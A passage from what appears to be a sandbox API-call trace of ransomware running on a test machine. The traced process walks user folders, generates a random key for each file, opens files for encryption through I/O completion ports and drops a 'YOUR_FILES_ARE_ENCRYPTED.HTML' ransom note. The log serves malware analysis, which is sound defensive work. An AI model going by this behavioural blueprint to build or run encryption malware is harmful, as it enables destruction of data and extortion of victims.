wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned 118 [0125.018] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0125.018] lstrlenW (lpString=".regtrans-ms") returned 12 [0125.018] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0125.018] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0125.018] StrStrIW (lpFirst="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.018] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned 118 [0125.018] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0125.018] lstrlenW (lpString=".regtrans-ms") returned 12 [0125.018] PathFindExtensionW (pszPath="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0125.018] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0125.018] StrStrIW (lpFirst="ntuser.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.018] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\ntuser.ini") returned 36 [0125.018] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0125.018] lstrlenW (lpString=".ini") returned 4 [0125.018] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0125.018] SystemFunction036 (in: RandomBuffer=0x19f0d0, RandomBufferLength=0x20 | out: RandomBuffer=0x19f0d0) returned 1 [0125.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\ntuser.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0125.019] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19f0f4 | out: lpFileSize=0x19f0f4*=20) returned 1 [0125.019] CloseHandle (hObject=0x314) returned 1 [0125.019] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0125.019] StrStrIW (lpFirst="OneDrive", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.019] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive") returned 34 [0125.019] GetProcessHeap () returned 0x600000 [0125.019] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.019] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive" [0125.019] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*" [0125.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0125.020] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0125.020] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0125.020] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.020] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini") returned 46 [0125.020] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.020] lstrlenW (lpString=".ini") returned 4 [0125.020] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0125.020] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.020] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=103) returned 1 [0125.020] CloseHandle (hObject=0x328) returned 1 [0125.020] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x84aeda3c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x67, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0125.020] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0125.021] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0125.021] GetProcessHeap () returned 0x600000 [0125.021] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0125.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0125.022] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0125.022] CloseHandle (hObject=0x314) returned 1 [0125.023] GetProcessHeap () returned 0x600000 [0125.023] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0125.023] GetProcessHeap () returned 0x600000 [0125.023] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.023] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5285d59c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5285d59c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Pictures", cAlternateFileName="")) returned 1 [0125.023] StrStrIW (lpFirst="Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.023] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures") returned 34 [0125.023] GetProcessHeap () returned 0x600000 [0125.023] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0125.023] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures" [0125.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\*" [0125.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5285d59c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5285d59c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0125.023] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5285d59c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5285d59c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0125.023] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96275be0, ftCreationTime.dwHighDateTime=0x1d7081b, ftLastAccessTime.dwLowDateTime=0xfe249b50, ftLastAccessTime.dwHighDateTime=0x1d70865, ftLastWriteTime.dwLowDateTime=0xfe249b50, ftLastWriteTime.dwHighDateTime=0x1d70865, nFileSizeHigh=0x0, nFileSizeLow=0x5e1e, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="1JUnHazFTyA.png", cAlternateFileName="1JUNHA~1.PNG")) returned 1 [0125.023] StrStrIW (lpFirst="1JUnHazFTyA.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.023] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\1JUnHazFTyA.png") returned 50 [0125.023] PathFindExtensionW (pszPath="1JUnHazFTyA.png") returned=".png" [0125.023] lstrlenW (lpString=".png") returned 4 [0125.023] PathFindExtensionW (pszPath="1JUnHazFTyA.png") returned=".png" [0125.023] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\1JUnHazFTyA.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1junhazftya.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0125.024] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=24094) returned 1 [0125.024] GetProcessHeap () returned 0x600000 [0125.024] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.025] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="0E") returned 2 [0125.025] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="AC") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="96") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="F8") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="AE") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="D0") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="03") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="E5") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="B0") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="57") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="ED") returned 2 [0125.025] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="C3") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="B8") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="D8") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="BA") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="DF") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="63") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="D4") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="53") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="47") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="5B") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="FA") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="47") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="B1") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="50") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="F8") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="83") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="0B") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="13") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="EE") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="5D") returned 2 [0125.026] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="6E") returned 2 [0125.026] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\1JUnHazFTyA.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\1JUnHazFTyA.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\1JUnHazFTyA.png" [0125.026] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.027] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.030] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14435b00, ftCreationTime.dwHighDateTime=0x1d70722, ftLastAccessTime.dwLowDateTime=0xa75bc330, ftLastAccessTime.dwHighDateTime=0x1d70a71, ftLastWriteTime.dwLowDateTime=0xa75bc330, ftLastWriteTime.dwHighDateTime=0x1d70a71, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="8JYyGxLLeSCuOZKSt_1", cAlternateFileName="8JYYGX~1")) returned 1 [0125.030] StrStrIW (lpFirst="8JYyGxLLeSCuOZKSt_1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.030] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1") returned 54 [0125.030] GetProcessHeap () returned 0x600000 [0125.030] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0125.031] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1" [0125.031] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\*" [0125.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14435b00, ftCreationTime.dwHighDateTime=0x1d70722, ftLastAccessTime.dwLowDateTime=0xa75bc330, ftLastAccessTime.dwHighDateTime=0x1d70a71, ftLastWriteTime.dwLowDateTime=0xa75bc330, ftLastWriteTime.dwHighDateTime=0x1d70a71, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0125.031] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14435b00, ftCreationTime.dwHighDateTime=0x1d70722, ftLastAccessTime.dwLowDateTime=0xa75bc330, ftLastAccessTime.dwHighDateTime=0x1d70a71, ftLastWriteTime.dwLowDateTime=0xa75bc330, ftLastWriteTime.dwHighDateTime=0x1d70a71, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="..", cAlternateFileName="")) returned 1 [0125.031] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9c0cf50, ftCreationTime.dwHighDateTime=0x1d70163, ftLastAccessTime.dwLowDateTime=0x8e56c8a0, ftLastAccessTime.dwHighDateTime=0x1d705c4, ftLastWriteTime.dwLowDateTime=0x8e56c8a0, ftLastWriteTime.dwHighDateTime=0x1d705c4, nFileSizeHigh=0x0, nFileSizeLow=0x1753, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="4rFQmUQ.gif", cAlternateFileName="")) returned 1 [0125.031] StrStrIW (lpFirst="4rFQmUQ.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.031] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\4rFQmUQ.gif") returned 66 [0125.031] PathFindExtensionW (pszPath="4rFQmUQ.gif") returned=".gif" [0125.031] lstrlenW (lpString=".gif") returned 4 [0125.031] PathFindExtensionW (pszPath="4rFQmUQ.gif") returned=".gif" [0125.031] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\4rFQmUQ.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\4rfqmuq.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.032] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=5971) returned 1 [0125.032] GetProcessHeap () returned 0x600000 [0125.032] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.033] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="8C") returned 2 [0125.033] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="6D") returned 2 [0125.033] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="77") returned 2 [0125.033] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="36") returned 2 [0125.033] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="69") returned 2 [0125.033] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="74") returned 2 [0125.033] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="E5") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="26") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="A1") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="62") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="EE") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="C3") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="D8") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="93") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="6F") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="3F") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="1D") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="AA") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="C6") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="DC") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="5A") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="70") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="EF") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="6C") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="C8") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="0F") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="66") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="80") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="13") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="88") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="A8") returned 2 [0125.033] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="34") returned 2 [0125.034] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\4rFQmUQ.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\4rFQmUQ.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\4rFQmUQ.gif" [0125.034] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.034] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, 